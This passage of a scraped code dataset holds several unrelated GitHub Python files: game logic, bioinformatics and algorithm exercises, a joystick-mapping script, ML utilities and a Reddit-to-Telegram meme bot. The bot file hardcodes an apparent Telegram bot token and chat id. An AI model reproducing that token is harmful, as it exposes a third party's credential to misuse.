7])\nprint(b)\n","repo_name":"xeusteerapat/MIT-6.00.1x-EDX","sub_path":"Week_06/complexity_classes/quadratic.py","file_name":"quadratic.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40071341410","text":"from data.action import Action\nfrom data.asteroid import add_explosion\n\nclass HandleCollisionsAction(Action):\n \"\"\"A code template for handling collisions. The responsibility of this class of objects is to update the game state when actors collide.\n \"\"\"\n\n def execute(self, game, cast):\n \"\"\"Executes the action using the given actors.\n\n Args:\n game\n\n cast (dict): The game actors {key: tag, value: list}.\n \"\"\"\n players = cast[\"players\"]\n\n for player in players:\n collision_list = player.collides_with_list(cast[\"asteroids\"])\n if collision_list:\n add_explosion(cast[\"particles\"], player.position)\n cast[\"players\"].remove(player)\n\n for asteroid in cast[\"asteroids\"]:\n for player in players:\n collision_list = asteroid.collides_with_list(player.laser_list)\n if collision_list:\n laser = collision_list[0]\n\n score = cast[\"asteroids\"][cast[\"asteroids\"].index(asteroid)].damage(laser.damage, cast)\n player.laser_list.remove(laser)\n\n if score != False:\n player.score += score\n break","repo_name":"ethancharles02/asteroids","sub_path":"data/handle_collisions_action.py","file_name":"handle_collisions_action.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25528389122","text":"def read_FASTA(file_path):\n sequences_dict = {}\n\n with open(file_path, \"r\") as f:\n lines = f.readlines()\n\n current_label = \"\"\n\n for index, item in enumerate(lines):\n if item[0] == \">\":\n current_label = item[1:].rstrip()\n sequences_dict[current_label] = \"\"\n else:\n sequences_dict[current_label] += item.rstrip()\n\n return sequences_dict\n\ndef DNA_complement(sequence):\n complement = \"\"\n for i in sequence:\n if i == \"A\":\n complement += \"T\"\n elif i == \"T\":\n complement += \"A\"\n elif i == \"C\":\n complement += \"G\"\n elif i == \"G\":\n complement += \"C\"\n return complement[::-1]\n\ndef main():\n data = read_FASTA(\"data/rosalind_revp.txt\")\n keys = list(data)\n dna_string = data[keys[0]]\n\n for start in range(0, len(dna_string)):\n for end in range(start, len(dna_string)):\n\n s = dna_string[start:end+1]\n l = len(s)\n\n if l >= 4 and l <= 12 and s == DNA_complement(s):\n print(str(start+1)+\" \"+str(end-start+1))\n\nif __name__ == '__main__':\n main()","repo_name":"zkokelj/rosalind","sub_path":"REVP.py","file_name":"REVP.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"727977249","text":"import time\nimport feedparser\nimport requests\nimport os\n\nchat_id = -1001789110861\nbot_token = \"5299386335:AAGXz22rE-zWa_k1YHy899KpYyJeCMkaVu8\"\nfeed_url = \"https://www.reddit.com/r/memes/new/.rss\"\n\nbin = 5\nl_bin = 7\n\nwhile bin <= l_bin:\n blog_feed = feedparser.parse(feed_url)\n blog_feed.feed.title\n blog_feed.feed.link\n len(blog_feed.entries)\n link = (blog_feed.entries[0].link)\n #print(link)\n \n response = requests.get(f'https://redditsave.com/info?url={link}')\n qq = response.text\n def slicetext(text, start, end):\n try:\n return text.split(start)[1].split(end)[0]\n except:\n return \"\"\n \n ww = slicetext(f\"{qq}\", \"https://i.redd.it/\", \"\\\" class\")\n #print(ww)\n with open('last.txt') as f:\n lines = f.readlines(0)\n #print(lines)\n ww2 = f'[\\'{ww}\\']'\n if str(lines)==ww2:\n #print(ww2)\n print('Nope')\n else:\n url = f'https://api.telegram.org/bot{bot_token}/sendPhoto?chat_id={chat_id}&photo=https://i.redd.it/{ww}&caption=Join+Us+@MemeWorldNo1'\n r = requests.get(url, allow_redirects=True)\n #print(r.text)\n with open('last.txt', 'w') as f:\n f.write(f'{ww}')\n time.sleep(5)\n","repo_name":"Ash-Boi/reddit-img-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4490512442","text":"if starting:\n # --------功能设置部分--------\n is_roll_yaw_connect = False # 偏航与滚转连动,启动时需设置鼠标操作限制部分中的连动程度\n is_aim_mode = True # 瞄准模式,按下右键时禁用滚转,鼠标x轴映射至偏航,精确调整机头指向用\n # ------------------------\n # 映射vjoy设备\n v = vJoy[0]\n # vjoy最大轴行程\n axis_max = 8 + v.axisMax\n axis_min = -8 - v.axisMax\n\n # --------轴定义部分,勿动--------\n # xyz轴定义\n pitch_axis = 0\n roll_axis = 0\n yaw_axis = 0\n # 油门轴定义\n throttle_axis = axis_min\n # 视角轴定义\n view_x_axis = 0\n view_y_axis = 0\n view_back_x = 0\n # 辅助轴定义\n key_pitch_axis = 0\n key_roll_axis = 0\n key_yaw_axis = 0\n mouse_pitch_axis = 0\n # 键盘操作判断\n key_pitch = False\n key_roll = False\n key_yaw = False\n # ------------------------\n\n # --------鼠标操作限制,默认可操作至满行程的75%(偏航除外,偏航默认与滚转连动),可自行修改--------\n mouse_pitch_limit = 0.75\n mouse_roll_limit = 0.75\n mouse_yaw_limit = 0.5\n # ------------------------\n\n # --------键盘操作限制,默认键盘操作时满杆,可自行修改--------\n key_pitch_limit = 1\n key_roll_limit = 1\n key_yaw_limit = 1\n # ------------------------\n\n # --------头部转动限制,默认偏转至左右90度,可自行修改--------\n max_head_yaw = 0.5\n max_head_pitch = 0.5\n\n # --------各轴灵敏度,可自行修改--------\n mouse_pitch_sens = 30\n mouse_roll_sens = 30\n mouse_yaw_sens = 30\n throttle_sens = 0.03\n aim_mode_sens = 15\n\n# --------按键设置部分--------\n\n# xyz三轴满杆按键,可自行修改\nkey_roll_left = keyboard.getKeyDown(Key.A) # 滚转\nkey_roll_right = keyboard.getKeyDown(Key.D)\nkey_pitch_up = keyboard.getKeyDown(Key.S) # 俯仰\nkey_pitch_down = keyboard.getKeyDown(Key.W)\nkey_yaw_left = keyboard.getKeyDown(Key.Q) # 偏航\nkey_yaw_right = keyboard.getKeyDown(Key.E)\n\n# 类苦力帽式视角调整,快捷键可自行修改\nkey_view_left = keyboard.getKeyDown(\n Key.Q) & keyboard.getKeyDown(Key.LeftAlt) # 向左看\nkey_view_right = keyboard.getKeyDown(\n Key.E) & keyboard.getKeyDown(Key.LeftAlt) # 向右看\nkey_view_back = keyboard.getKeyDown(\n Key.S) & keyboard.getKeyDown(Key.LeftAlt) # 向后看\nkey_view_up = keyboard.getKeyDown(\n Key.W) & keyboard.getKeyDown(Key.LeftAlt) # 向上看\n\nkey_free_view = keyboard.getKeyDown(Key.LeftAlt) # 自由视角\nkey_pitch_center = mouse.getButton(2) # 俯仰回中\nkey_aim_mode = mouse.getButton(1) # 瞄准模式,鼠标x轴变为偏航\nkey_throttle_up = keyboard.getKeyDown(Key.LeftShift) # 油门轴增加\nkey_throttle_down = keyboard.getKeyDown(Key.LeftControl) # 油门轴减少\n\n# --------代码实现--------\n# xyz三轴\nif (not key_free_view):\n # 俯仰\n if key_pitch_center:\n pitch_axis = 0\n elif key_pitch_up:\n key_pitch_axis = axis_max*key_pitch_limit\n key_pitch = True\n elif key_pitch_down:\n key_pitch_axis = axis_min*key_pitch_limit\n key_pitch = True\n else:\n key_pitch = False\n mouse_pitch_axis -= (mouse.deltaY*mouse_pitch_sens)\n\n # 滚转&偏航\n if key_roll_left:\n key_roll_axis = axis_min*key_roll_limit\n key_roll = True\n elif key_roll_right:\n key_roll_axis = axis_max*key_roll_limit\n key_roll = True\n elif key_yaw_left:\n key_yaw_axis = axis_min*key_yaw_limit\n key_yaw = True\n elif key_yaw_right:\n key_yaw_axis = axis_max*key_yaw_limit\n key_yaw = True\n else:\n key_roll = False\n key_yaw = False\n if(key_aim_mode and is_aim_mode):\n yaw_axis += (mouse.deltaX*mouse_yaw_sens)\n roll_axis = 0\n else:\n roll_axis = (mouse.deltaX*mouse_roll_sens*mouse_roll_limit*10)\n if is_roll_yaw_connect:\n yaw_axis = (mouse.deltaX*mouse_yaw_sens*mouse_yaw_limit*10)\nelse:\n roll_axis = 0\n yaw_axis = 0\n\n# 油门轴\nif key_throttle_up:\n throttle_axis += (axis_max*throttle_sens)\nif key_throttle_down:\n throttle_axis -= (axis_max*throttle_sens)\nif throttle_axis > axis_max:\n throttle_axis = axis_max\nelif throttle_axis < axis_min:\n throttle_axis = axis_min\n\n# 视角轴\nif key_view_left and key_view_right:\n view_x_axis = 0\nelif key_view_left and key_view_back:\n view_x_axis = axis_max\n view_back_x = 0\nelif key_view_right and key_view_back:\n view_x_axis = -axis_max\n view_back_x = 1\nelif key_view_back:\n if view_back_x == 0:\n view_x_axis = axis_max\n elif view_back_x == 1:\n view_x_axis = -axis_max\nelif key_view_left:\n view_x_axis = axis_max*max_head_yaw\nelif key_view_right:\n view_x_axis = -axis_max*max_head_yaw\nelif key_view_up:\n view_y_axis = axis_max*max_head_pitch\nelse:\n view_x_axis = 0\n view_y_axis = 0\n\n# 限制部分\n\nif key_roll:\n roll_axis = key_roll_axis\n if roll_axis > axis_max*key_roll_limit:\n roll_axis = axis_max*key_roll_limit\n elif roll_axis < axis_min*key_roll_limit:\n roll_axis = axis_min*key_roll_limit\nelse:\n if roll_axis > axis_max*mouse_roll_limit:\n roll_axis = axis_max*mouse_roll_limit\n elif roll_axis < axis_min*mouse_roll_limit:\n roll_axis = axis_min*mouse_roll_limit\n\nif key_yaw:\n yaw_axis = key_yaw_axis\n if yaw_axis > axis_max*key_yaw_limit:\n yaw_axis = axis_max*key_yaw_limit\n elif yaw_axis < axis_min*key_yaw_limit:\n yaw_axis = axis_min*key_yaw_limit\nelse:\n if yaw_axis > axis_max*mouse_yaw_limit:\n yaw_axis = axis_max*mouse_yaw_limit\n elif yaw_axis < axis_min*mouse_yaw_limit:\n yaw_axis = axis_min*mouse_yaw_limit\n\nif key_pitch:\n pitch_axis = key_pitch_axis\n if pitch_axis > axis_max*key_pitch_limit:\n pitch_axis = axis_max*key_pitch_limit\n elif pitch_axis < axis_min*key_pitch_limit:\n pitch_axis = axis_min*key_pitch_limit\nelse:\n pitch_axis = mouse_pitch_axis\n if pitch_axis > axis_max*mouse_pitch_limit:\n pitch_axis = axis_max*mouse_pitch_limit\n elif pitch_axis < axis_min*mouse_pitch_limit:\n pitch_axis = axis_min*mouse_pitch_limit\n\n# --------vjoy轴与按钮映射--------\nv.x = pitch_axis\nv.y = roll_axis\nv.z = yaw_axis\nv.rx = view_x_axis\nv.ry = view_y_axis\nv.slider = throttle_axis\n","repo_name":"lazarau/DCS_Script","sub_path":"fc3(legacy).py","file_name":"fc3(legacy).py","file_ext":"py","file_size_in_byte":6418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69938649444","text":"import os\r\nimport shutil\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# Dataset path\r\nsrc_directory = '/cs/home/psxrm17/db/plantvillage'\r\nbase_target_directory = '/cs/home/psxrm17/db/PlantVillageDataset' \r\n\r\n# Target directories\r\ntrain_dir = os.path.join(base_target_directory, 'train')\r\nval_dir = os.path.join(base_target_directory, 'val')\r\ntest_dir = os.path.join(base_target_directory, 'test')\r\n\r\n#Splitting for each class\r\nfor class_name in os.listdir(src_directory):\r\n class_dir = os.path.join(src_directory, class_name)\r\n \r\n if os.path.isdir(class_dir):\r\n images = os.listdir(class_dir)\r\n train, temp = train_test_split(images, test_size=0.2, random_state=42)\r\n val, test = train_test_split(temp, test_size=0.5, random_state=42)\r\n\r\n def copy_files(files, target_dir):\r\n os.makedirs(target_dir, exist_ok=True)\r\n for file in files:\r\n shutil.copy(os.path.join(class_dir, file), os.path.join(target_dir, file))\r\n \r\n # Save the splitted dataset\r\n copy_files(train, os.path.join(train_dir, class_name))\r\n copy_files(val, os.path.join(val_dir, class_name))\r\n copy_files(test, os.path.join(test_dir, class_name))\r\n","repo_name":"RizaMithani/Plant-Disease-Classification-with-Ensemble-Learning","sub_path":"dataset_split.py","file_name":"dataset_split.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23460680358","text":"#Lesson 31\n#Intersection of 2 Linked Lists\nclass Node(object):\n def __init__(self, value, next=None):\n self.value = value\n self.next = next\n\nclass Solution(object):\n def _length(self, n):\n len = 0\n curr = n\n while curr:\n curr = curr.next\n len+=1\n return len\n\n def intersection(self, a, b):\n lenA = self._length(a)\n lenB = self._length(b)\n currA = a\n currB = b\n if lenA > lenB:\n for _ in range(lenA - lenB):\n currA = currA.next\n else:\n for _ in range(lenB - lenA):\n currB = currB.next\n\n while currA != currB:\n currA = currA.next\n currB = currB.next\n\n return currA\n\n#test input\na = Node(1)\na.next = Node(2)\na.next.next = Node(3)\na.next.next.next = Node(4)\n\nb = Node(6)\nb.next = a.next.next\n\nprint(Solution().intersection(a, b).value)\n\n#Lesson 32\n#First missing pos integer\nclass Solution(object):\n def first_missing_position(self, nums):\n hash = {}\n for n in nums:\n hash[n] = 1\n\n for i in range(1, len(nums)):\n if i not in hash:\n return i\n return -1\n#test input\nprint(Solution().first_missing_position([3, 4, -1, 1]))\n\n#Lesson 33\n#Meeting Rooms\nimport heapq\n\ndef meeting_rooms(meetings):\n meetings.sort(key=lambda x: x[0])\n meeting_ends = []\n max_rooms = 0\n\n for meeting in meetings:\n while meeting_ends and meeting_ends[0] <= meeting[0]:\n heapq.heappop(meeting_ends)\n heapq.heappush(meeting_ends, meeting[1])\n max_rooms = max(max_rooms, len(meeting_ends))\n\n return max_rooms\n#test input\nprint(meeting_rooms([[0, 10], [10, 20]]))\n\nprint(meeting_rooms([[20, 30], [10, 21], [0, 50]]))\n\n#Lesson 34\n#Sort Colors\nfrom collections import defaultdict\n\nclass Solution(object):\n #hashmap implementation\n def sortColors(self, colors):\n colorsMap = defaultdict(int)\n for c in colors:\n colorsMap[c] += 1\n\n index = 0\n for i in range(colorsMap[0]):\n colors[index] = 0\n index += 1\n for i in range(colorsMap[1]):\n colors[index] = 1\n index += 1\n for i in range(colorsMap[2]):\n colors[index] = 2\n index += 1\n\n #indeces sort\n def sortColors2(self, colors):\n lowIndex = 0\n highIndex = len(colors) - 1\n currIndex = 0\n\n while currIndex <= highIndex:\n if colors[currIndex] == 0:\n colors[lowIndex], colors[currIndex] = colors[currIndex], colors[lowIndex]\n lowIndex += 1\n currIndex += 1\n elif colors[currIndex] == 2:\n colors[highIndex], colors[currIndex] = colors[currIndex], colors[highIndex]\n highIndex -= 1\n else:\n currIndex += 1\n\n#test input\ncolors = [0, 2, 1, 0, 1, 1, 2]\nSolution().sortColors(colors)\nprint(colors)\n\ncolors = [0, 2, 1, 0, 1, 1, 2]\nSolution().sortColors2(colors)\nprint(colors)\n\n#Lesson 35\n#Number of Islands\nclass Solution(object):\n def num_islands(self, grid):\n if not grid or not grid[0]:\n return 0\n numRows, numCols = len(grid), len(grid[0])\n count = 0\n\n for row in range(numRows):\n for col in range(numCols):\n if self._is_land(grid, row, col):\n count += 1\n self._sinkLand(grid, row, col)\n return count\n \n def _sinkLand(self, grid, row, col):\n if not self._is_land(grid, row, col):\n return \n grid[row][col] = 0\n for d in [(0, 1), (0, -1), (1, 0), (-1, 0)]:\n self._sinkLand(grid, row + d[0], col + d[1])\n\n def _is_land(self, grid, row, col):\n if row < 0 or col < 0 or row >= len(grid) or col >= len(grid[0]):\n return False\n return grid[row][col] == 1\n \n#test input\ngrid = [[1, 1, 0, 0, 0], \n [0, 1, 0, 0, 1],\n [1, 0, 0, 1, 1], \n [0, 0, 0, 0, 0]]\n\nprint(Solution().num_islands(grid))","repo_name":"dominic-sangcap/python_algopro","sub_path":"AlgoPro/algopro_lesson_31-35.py","file_name":"algopro_lesson_31-35.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41497194919","text":"# Here you can create play commands that are specific to the module, and extend existing commands\n\nimport os, os.path\nimport sys\nimport shutil\nimport subprocess\n\nMODULE = 'wsimport'\n\n# Commands that are specific to your module\n\nCOMMANDS = ['wsimport:gen']\n\ndef execute(**kargs):\n command = kargs.get(\"command\")\n app = kargs.get(\"app\")\n args = kargs.get(\"args\")\n env = kargs.get(\"env\")\n\n if command == \"wsimport:gen\":\n if os.path.exists(\"tmp/jaxws/\"):\n shutil.rmtree(\"tmp/jaxws\")\n\n os.makedirs(\"tmp/jaxws/\")\n\n for x in args:\n wsimport_args = [\"-d \", \"tmp/jaxws/ \", x]\n java_cmd = app.java_cmd(['-Xmx64m'], className='com.sun.tools.ws.WsImport', args=[wsimport_args])\n #print java_cmd\n #print os.environ\n subprocess.call(java_cmd, env=os.environ)\n\n jar_args = [\" -cvf\", \" lib/jaxws.jar\", \" -C\",\" tmp/jaxws/\", \" .\"]\n java_cmd = app.java_cmd(['-Xmx64m'], className='sun.tools.jar.Main', args=[jar_args])\n #print java_cmd\n subprocess.call(java_cmd, env=os.environ)\n\n# This will be executed before any command (new, run...)\ndef before(**kargs):\n command = kargs.get(\"command\")\n app = kargs.get(\"app\")\n args = kargs.get(\"args\")\n env = kargs.get(\"env\")\n\n\n# This will be executed after any command (new, run...)\ndef after(**kargs):\n command = kargs.get(\"command\")\n app = kargs.get(\"app\")\n args = kargs.get(\"args\")\n env = kargs.get(\"env\")\n\n if command == \"new\":\n pass\n","repo_name":"mallowlabs/play-wsimport-module","sub_path":"commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36899196659","text":"import sys\n\nfrom allennlp.common import FromParams\n\n\nclass WebQaQueryGenerator(FromParams):\n COMMANDS = \"Describe|State|Name\".split(\"|\")\n OBJECTS = [\"thing\", \"object\", \"entity\"]\n\n @staticmethod\n def _replace_noun(source_queries):\n out = []\n for q in source_queries:\n for obj in WebQaQueryGenerator.OBJECTS:\n if obj == \"thing\" and \"the $noun\" in q:\n # \"the thing\" doesn't really sound right\n continue\n out.append(q.replace(\"$noun\", obj))\n return out\n\n def __init__(self, version=0):\n self.version = version\n\n # Extra sample of the main query\n a2_queries = ['What $adj_type is this $noun?']\n for prefix in [\"this\", \"the\", \"that\"]:\n for qprefix in [\"What\", \"Which\"]:\n a2_queries += [f\"{qprefix} $adj_type is {prefix} $noun?\"]\n a2_queries += [f\"What is the $adj_type of {prefix} $noun?\"]\n for cmd in self.COMMANDS:\n a2_queries.append(f\"{cmd} the $adj_type of {prefix} $noun.\")\n\n a1_queries = self._replace_noun(a2_queries)\n\n v2_queries = []\n for prefix in [\"this\", \"the\", \"that\"]:\n # Oversample the main query\n v2_queries += [f\"What is {prefix} $noun doing?\"]*4\n\n v2_queries.append(f\"What action is {prefix} $noun taking?\")\n v2_queries.append(f\"What action is {prefix} $noun doing?\")\n v2_queries.append(f\"What activity is {prefix} $noun doing?\")\n\n for cmd in self.COMMANDS:\n v2_queries.append(f\"{cmd} the action being taken by {prefix} $noun.\")\n v2_queries.append(f\"{cmd} the activity {prefix} $noun is doing.\")\n v2_queries.append(f\"{cmd} what {prefix} $noun is doing.\")\n\n v1_queries = []\n for q in [\"What\", \"Which\"]:\n v1_queries += [\n f\"{q} action is being done?\",\n f\"{q} activity is being done?\",\n f\"{q} activity is this?\",\n f\"{q} action is being taken?\"\n ] * 2\n v1_queries += [\"What is being done?\"] * 3\n v1_queries += self._replace_noun(v2_queries)\n\n n1_queries = []\n for prefix in [\"this\", \"that\"]:\n n1_queries += [f\"What object is {prefix}?\"]*3\n n1_queries += [f\"What is {prefix}?\"]*2\n n1_queries += [f\"What entity is {prefix}?\"]*2\n\n for obj in self.OBJECTS:\n n1_queries += [f\"What is {prefix} {obj}?\"]\n for cmd in [\"Name\", \"Describe\", \"Classify\"]:\n n1_queries.append(f\"{cmd} {prefix} {obj}.\")\n\n self.train_types = {\n \"1n\": n1_queries,\n \"1v\": v1_queries,\n \"1a\": a1_queries,\n \"2a\": a2_queries,\n \"2v\": v2_queries,\n }\n\n self.test_types = {k: v[:1] for k, v in self.train_types.items()}\n\n def get_prompts(self, x, is_train=True):\n if is_train:\n templates = self.train_types[x.qtype]\n else:\n templates = self.test_types[x.qtype]\n\n if x.question_type in {\"1n\", \"1v\"}:\n return templates\n\n if x.question_type == \"2v\":\n assert x.query.startswith(\"What is this \")\n assert x.query.endswith(\" doing?\")\n noun = x.query[len(\"What is this \"):-len(\" doing?\")]\n return [sys.intern(x.replace(\"$noun\", noun)) for x in templates]\n elif x.question_type == \"2a\":\n assert x.query.startswith(\"What \")\n assert x.query.endswith(\"?\")\n q = x.query[len(\"What \"):-1]\n adj_type, noun = q.split(\" is this \")\n return [sys.intern(x.replace(\"$noun\", noun).replace(\"$adj_type\", adj_type)) for x in templates]\n elif x.question_type == \"1a\":\n assert x.query.startswith(\"What \")\n assert x.query.endswith(\" is this entity?\")\n adj_type = x.query[len(\"What \"):-len(\" is this entity?\")]\n return [sys.intern(x.replace(\"$adj_type\", adj_type)) for x in templates]\n else:\n raise NotImplementedError()\n","repo_name":"michalsr/gpv","sub_path":"exp/ours/data/webqa_templates_old.py","file_name":"webqa_templates_old.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12334606328","text":"class SomeModel:\n def predict(self, message: str):\n pass\n\n\ndef custom_prediction(message: str) -> float:\n cnt = 0\n len_mes = len(message)\n for i in message:\n if i.isdigit():\n cnt += 1\n return cnt / len_mes\n\n\ndef predict_message_mood(\n message: str,\n model: SomeModel,\n bad_thresholds: float = 0.3,\n good_thresholds: float = 0.8,\n) -> str:\n if len(message) == 0:\n return \"Empty message\"\n pred = model.predict(message)\n if pred < bad_thresholds:\n return \"неуд\"\n if pred > good_thresholds:\n return \"отл\"\n return \"норм\"\n","repo_name":"maikdonut/made_python_course","sub_path":"advance_07/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26632978440","text":"import json\n\n\nclass Jsontesting:\n\n def __init__(self, json1):\n with open(json1, 'r') as testing1:\n import json\n self.testing2 = json.load(testing1)\n\n def balancecalculations(self, json2):\n testing3 = self.testing2[json2]\n if testing3:\n return int(testing3[\"sample1\"]) - testing3[\"sample2\"]\n\nif __name__ == '__main__':\n x = Jsontesting('Test1.json')\n y = x.balancecalculations('TEST1')\n print(y)","repo_name":"keitharaneta/globalmantics_crm1","sub_path":"2-1-JASON EXAMPLE.py","file_name":"2-1-JASON EXAMPLE.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74812305444","text":"import requests\nfrom sentence_transformers import SentenceTransformer, util\n\n\ndef cosine_section_similarity(czech_lines : list[str], english_lines : list[str]) -> float:\n\n czech_joined = \", \".join(czech_lines) \n english_joined = \", \".join(english_lines)\n\n url = 'http://lindat.mff.cuni.cz/services/translation/api/v2/models/cs-en'\n response = requests.post(url, data = {\"input_text\": czech_joined})\n response.encoding='utf8'\n cz_to_english_joined = response.text\n\n model = SentenceTransformer('paraphrase-multilingual-MiniLM-L12-v2') # multi-language model\n\n embedding1 = model.encode(cz_to_english_joined, convert_to_tensor=False)\n embedding2 = model.encode(english_joined, convert_to_tensor=False)\n\n cosine_similarity = util.cos_sim(embedding1, embedding2)\n\n return(cosine_similarity[0][0].item())\n\n\ndef get_semantic_similarity(czech_sections : list[list[str]], english_sections : list[list[str]]) -> float:\n\n similarity_sum = 0\n\n if len(czech_sections) != len(english_sections):\n raise ValueError(\"The lyrics differ in number of sections.\")\n \n n_sections = len(czech_sections)\n\n n_lines = 0\n for section in czech_sections:\n n_lines += len(section)\n\n for i in range(n_sections):\n similarity_sum += ((len(czech_sections[i]) / n_lines) * cosine_section_similarity(czech_sections[i], english_sections[i]))\n \n return similarity_sum","repo_name":"stepankovab/NLP-Umea","sub_path":"FinalProject/CODE/semantic_similarity.py","file_name":"semantic_similarity.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31626352899","text":"import tensorflow as tf\nimport numpy as np\n\nclass F1History(tf.keras.callbacks.Callback):\n\n def __init__(self, test_dataset):\n super(F1History, self).__init__()\n self.test_dataset =test_dataset\n self.history = {\n 'val_precision':[],\n 'val_recall':[],\n 'val_f1':[],\n }\n\n def on_epoch_end(self, epoch, logs={}):\n\n logs['val_precision'] = 0 \n logs['val_recall'] = 0\n logs['val_f1'] = 0\n\n true_pos = 0\n pred_pos = 0\n pos = 0\n for i,j in self.test_dataset:\n y = self.model.predict(i)\n y = np.round(y[:,0])\n j = j.numpy()\n true_pos += sum(y*j)\n pred_pos += sum(y)\n pos += sum(j)\n\n logs['val_precision'] = true_pos/pred_pos\n logs['val_recall'] = true_pos/pos\n logs['val_f1'] = 2*logs['val_precision']*logs['val_recall']/(logs['val_recall']+logs['val_precision'])\n \n self.history['val_precision'] += [logs['val_precision']]\n self.history['val_recall'] += [logs['val_recall']]\n self.history['val_f1'] += [logs['val_f1']]\n \n print(logs)\n # X_valid, y_valid = self.validation[0], self.validation[1]\n # y_val_pred = (self.model.predict(X_valid).ravel()>0.5)+0\n # val_score = f1_score(y_valid, y_val_pred)\n # logs['F1_score_train'] = np.round(score, 5)\n # logs['F1_score_val'] = np.round(val_score, 5)","repo_name":"nh0znoisung/Mask_Detection_IOT","sub_path":"serverAI/train/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9613326919","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\nimport sys\nsys.setrecursionlimit(300000)\n\ndef chk():\n cnt=0\n for i in range(8):\n if (w[i].count(\"Q\")>1): return 0\n if (w[i].count(\"Q\")==1): cnt+=1\n a=b=c=d=l=0\n for j in range(8):\n if w[j][i]==\"Q\": l+=1\n if i+j<8 and w[0+j][i+j]==\"Q\": a+=1\n if i-j>-1 and w[7-j][i-j]==\"Q\": b+=1\n if i-j>-1 and w[i-j][0+j]==\"Q\": c+=1\n if i+j<8 and w[i+j][7-j]==\"Q\": d+=1\n if l>1 or a>1 or b>1 or c>1 or d>1: return 0\n if cnt==8:\n for i in w:\n print(\"\".join(i))\n exit()\n return 1\n\ndef sol(a):\n for i in range(a,64,1):\n x=i//8\n y=i%8\n if w[x][y]==\"Q\": continue\n w[x][y]=\"Q\"\n if chk():\n sol(i+1)\n w[x][y]=\".\"\n\nw=[]\nfor i in range(8):\n w.append(list(input()))\nsol(0)\n \nprint(\"No Answer\")\n\n\n","repo_name":"clarinet758/atcoder","sub_path":"arc/r001_025/r001/c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"785467749","text":"\nimport sqlite3\n\n\"\"\"Курсор (sql) и блок кода с заполнением базы данными, должны быть в одной функции \"\"\"\ndef jok_db (b):\n o = 1\n db = sqlite3.connect('jokes.db')#Создаём базу данных которая называется jokes и подключаемся к ней\n sql = db.cursor()#Создаём переменную sql хронящюю в себе cursor\n\n #Создаём таблицу anecdot если она не созданна (IF NOT EXISTS), со столбцами: number, joke\n sql.execute(\"\"\"CREATE TABLE IF NOT EXISTS anecdot (\n number INT,\n joke TEXT\n \n )\"\"\")\n db.commit()#Потверждаем наше действие\n\n #Щётчик для того чтобы номера в базе шли друг за другом\n while True:\n sql.execute(f\"SELECT number FROM anecdot WHERE number = '{o}'\")#Берём номер для проверки его уникальности\n\n if sql.fetchone() is None:#Если такого нрмена ещё нет то\n break#Останавливаем цикл и идём записывать\n\n else:#Иначе, тоесть если такой номер уже есть то\n o = o + 1#Меняем номер и проверяем ещё раз\n \n #Проверка уникальности анекдота\n sql.execute(f\"SELECT joke FROM anecdot WHERE joke = '{b}'\")#Беррём анекдот для проверки уникальности\n\n if sql.fetchone() is None:#Если такого анекдота ешё нет\n \n sql.execute(f\"INSERT INTO anecdot VALUES (?, ?)\", (o, b ))#Заливаем в таблицу информацию\n db.commit()#Потверждаем наше действие\n \n #Выводим таблицу\n for value1 in sql.execute(\"SELECT * FROM anecdot\"):\n print(value1)\n print('')\n print('')\n print('')\n\n","repo_name":"Artyom000123/Bot_comedian-","sub_path":"jokes_db.py","file_name":"jokes_db.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3239786182","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/12931\n\nimport math\n\n\ndef solution(n):\n answer = 0\n\n while n/10 != 0:\n answer = answer+math.floor(n % 10)\n n = n/10\n\n # [실행] 버튼을 누르면 출력 값을 볼 수 있습니다.\n print('Hello Python')\n\n return answer\n","repo_name":"juwon5272/Programmers_Python","sub_path":"1week/자릿수더하기.py","file_name":"자릿수더하기.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20064189519","text":"import os\n\ndef child():\n print ('A new child ', os.getpid( ))\n os._exit(0) \n\ndef parent():\n while True:\n newpid = os.fork()\n if newpid == 0:\n child()\n else:\n pids = (os.getpid(), newpid)\n print (\"parent: {}, child: {}\".format(pids[0], pids[1]))\n if input( ) == 'q': 